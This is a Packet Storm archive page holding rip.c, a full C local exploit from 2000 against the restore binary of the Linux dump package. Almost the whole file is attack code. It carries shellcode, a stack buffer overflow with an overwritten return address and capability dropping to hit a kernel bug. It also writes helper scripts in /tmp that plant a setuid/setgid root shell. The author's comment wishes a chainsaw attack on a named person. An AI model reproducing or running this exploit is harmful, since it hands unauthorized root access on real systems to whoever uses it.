what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

rip.c

rip.c
Posted Jun 14, 2000
Authored by Scrippie | Site b0f.freebsd.lublin.pl

rip.c is a local exploit for the dump package version 0.3-14 and 0.4b13 (restore binary). Tested against linux, gives a UID=0 shell on 2.2.16, GID=0 on 2.2.15 and below.

tags | exploit, shell, local
systems | linux
SHA-256 | 8d54e411ea387b466577cd77afc89cd9c0b0bdeab57ec369fdba47baf3a580b8

rip.c

Change Mirror Download
/* 
DO NOT DISTRIBUTE - DO NOT DISTRIBUTE - DO NOT DISTRIBUTE

Restore In Peace ?

Guess not, silly mistakes keep being made in the dump package time
and time again... Someone should give it an audit once

For once, NOT a L4m3rz stylish shellscript, but a pure C program that
does the same trick.
It's so messy that I have changed my mind about not writing shellscript
exploits and will go and write a L4m3rz stylish script next time :)

Use as: rip <type> [offset]
Where type is: 1) dump 0.3-14 on regular Linux boxes
2) dump 0.3-14 on Linux boxes with 2.2.X && X<16 kernel
3) dump-0.4b13 on regular Linux boxes
4) dump-0.4b13 on Linux boxes with the buggy kernel

A Linux box with a buggy kernel will yield root. In other cases we get
a setgid root.

Type (1) might function a bit buggy with bash 2 since we cannot setgid
to 0 when we're egid 0 - set SHAT to ash or zsh instead :(
I realized that type 2 also doesn't work perfectly with bash2 - use a
real shell for this exploit.

Good Riddance!
-- Scrippie
-- ronald@grafix.nl - #phreak.nl - buffer0verfl0w security

Love goes out to: Hester, Maja, Renata

I hope the following person will ambushed by villains with chainsaws:
Gerrie Mansur

Shouts to: all my friends @ircnet and @IRL

DO NOT DISTRIBUTE - DO NOT DISTRIBUTE - DO NOT DISTRIBUTE

*/

#include <stdio.h>
#include <linux/capability.h>
#include <linux/unistd.h>
#include <sys/types.h>

#define NOP 0x90 /* Here I am again, I'm coming back for more */
#define RETA314 2052 /* Index number of the return address */
#define RETA4b13 2068
#define NUMNOPS 700 /* 700 usefull nops on the stack */
#define SHELLAT "/tmp/loki" /* Hail to thee, god of evil! */

#define SHAT "/bin/ash" /* And to thee, *nix utilities! */
#define CHOWNAT "/bin/chown"
#define CHMODAT "/bin/chmod"

#define GCCAT "/usr/bin/gcc" /* And to thee, GNU utilities! */

#define RESTAT "/sbin/restore" /* And to thee, buggy file! */

char hellcode[] =
"\x66\x31\xc0\x66\x31\xdb\xb0\x17\xcd\x80" /* Bash 2 evasion */
"\x66\x31\xc0\x66\x31\xdb\xb0\x2e\xcd\x80" /* Idem for gid */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/lk";

_syscall2(int, capset, cap_user_header_t, header, const cap_user_data_t, data)
extern int capset(cap_user_header_t header, cap_user_data_t data);
void banner(void);
void makeLKregular(void);
void makeLKbuggyKernel(void);
void makeCFILE(void);

unsigned long get_sp(void) {
__asm__("movl %esp, %eax");
}

main(int argc, char **argv)
{
FILE *evilRestore, lk;
char *overflow;
unsigned long addy;
int offset=0;
int retapos;
pid_t child;
int type;

if(argc<2) {
banner();
exit(-1);
}

if(argc == 3) offset = atoi(argv[2]);

switch(atoi(argv[1])) {
case 1:
printf("Assuming Dump package version: dump-0.3-14\n");
printf("Trying to grab SGID root shell...\n");
type = 1;
offset = 2500;
retapos = RETA314;
break;
case 2:
printf("Assuming Dump package version: dump-0.3-14\n");
printf("Trying to grab SUID root shell...\n");
type = 2;
offset = 2500;
retapos = RETA314;
break;
case 3:
printf("Assuming Dump package version: dump-0.4b13\n");
printf("Trying to grab SGID root shell...\n");
type = 1;
offset = 6000;
retapos = RETA4b13;
break;
case 4:
printf("Assuming Dump package version: dump-0.4b13\n");
printf("Trying to grab SUID root shell...\n");
type = 2;
offset = 6000;
retapos = RETA4b13;
break;
default:
printf("Unknown type - exiting\n");
exit(-1);
}

if(type == 2) {
struct __user_cap_header_struct caph={_LINUX_CAPABILITY_VERSION, 0};
struct __user_cap_data_struct capd={0, 0, 0xfffffe7f};
capset(&caph, &capd);
printf("Dropped the SETUID_CAP...\n");
}

addy = get_sp() - offset;

overflow = (char *) malloc(retapos+5);

memset(overflow, 0x90, retapos);

memcpy((overflow+NUMNOPS), hellcode, strlen(hellcode));

overflow[retapos] = addy & 0xff;
overflow[retapos+1] = (addy >> 8 & 0xff);
overflow[retapos+2] = (addy >> 16 & 0xff);
overflow[retapos+3] = (addy >> 24 & 0xff);
overflow[retapos+4] = 0x00;

evilRestore = fopen("/tmp/t", "w");

printf("Building C program wrapper...\n");
makeCFILE();
printf("Building ShellScript that will be called...\n");

if(type == 1) makeLKregular();
if(type == 2) makeLKbuggyKernel();

printf("Building overflow file...\n");
printf("Using address: %x\n", addy);

fprintf(evilRestore, "n\nn\nn\nn\n1\n");
fprintf(evilRestore, overflow);
fprintf(evilRestore, "\n1\nnone\n");

fflush(evilRestore);
fclose(evilRestore);

printf("Executing: %s\n", RESTAT);
sleep(3);

if((child = fork()) == 0) {
char blaat[200];
snprintf(blaat, 200, "%s -R < /tmp/t\n", RESTAT);
system(blaat);
unlink("/tmp/t");
unlink("/tmp/lk");
}

printf("\nIf everything worked out you can now run: %s\n", SHELLAT);

}

void makeLKregular(void)
{
FILE *lk;
char blaat[1000]; /* Phjear the allmighty mem-sucker! */

lk = fopen("/tmp/lk", "w");

snprintf(blaat, 1000, "#!%s\n%s .root %s\n%s 6755 %s\n",
SHAT, CHOWNAT, SHELLAT, CHMODAT, SHELLAT);

fprintf(lk, blaat);
fflush(lk);
fclose(lk);
umask(0);
chmod("/tmp/lk", 0755);
}

void makeLKbuggyKernel(void)
{
FILE *lk;
char blaat[1000]; /* Phjear the allmighty mem-sucker! */

lk = fopen("/tmp/lk", "w");

snprintf(blaat, 1000, "#!%s\n%s root.root %s\n%s 6755 %s\n",
SHAT, CHOWNAT, SHELLAT, CHMODAT, SHELLAT);

fprintf(lk, blaat);
fflush(lk);
fclose(lk);
umask(0);
chmod("/tmp/lk", 0755);
}


void makeCFILE(void)
{
FILE *loki;
pid_t child;

loki = fopen("/tmp/loki.c", "w");
fprintf(loki, "#include <stdio.h>\n\n");
fprintf(loki, "main()\n");
fprintf(loki, "{\n setuid(0);\n");
fprintf(loki, " setgid(0);\n");
fprintf(loki, " execl(\"");
fprintf(loki, SHAT);
fprintf(loki, "\", \"sh\", NULL);\n");
fprintf(loki, "}");

fflush(loki);
fclose(loki);

if((child = fork()) == 0) {
execl(GCCAT, "gcc", "/tmp/loki.c", "-o", SHELLAT, NULL);
}
wait();
unlink("/tmp/loki.c");
}

void banner(void)
{
printf("Restore In Peace ? - Scrippie/#phreak.nl/b0f\n");
printf("--------------------------------------------\n");
printf("Use as: rip <type> [offset]\n");
printf("Types - 1) dump-0.3-14 - Regular Linux\n");
printf(" - 2) dump-0.3-14 - Linux with buggy kernel :)\n");
printf(" - 3) dump-0.4b13 - Regular Linux\n");
printf(" - 4) dump-0.4b13 - Linux with buggy kernel :)\n");
}
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close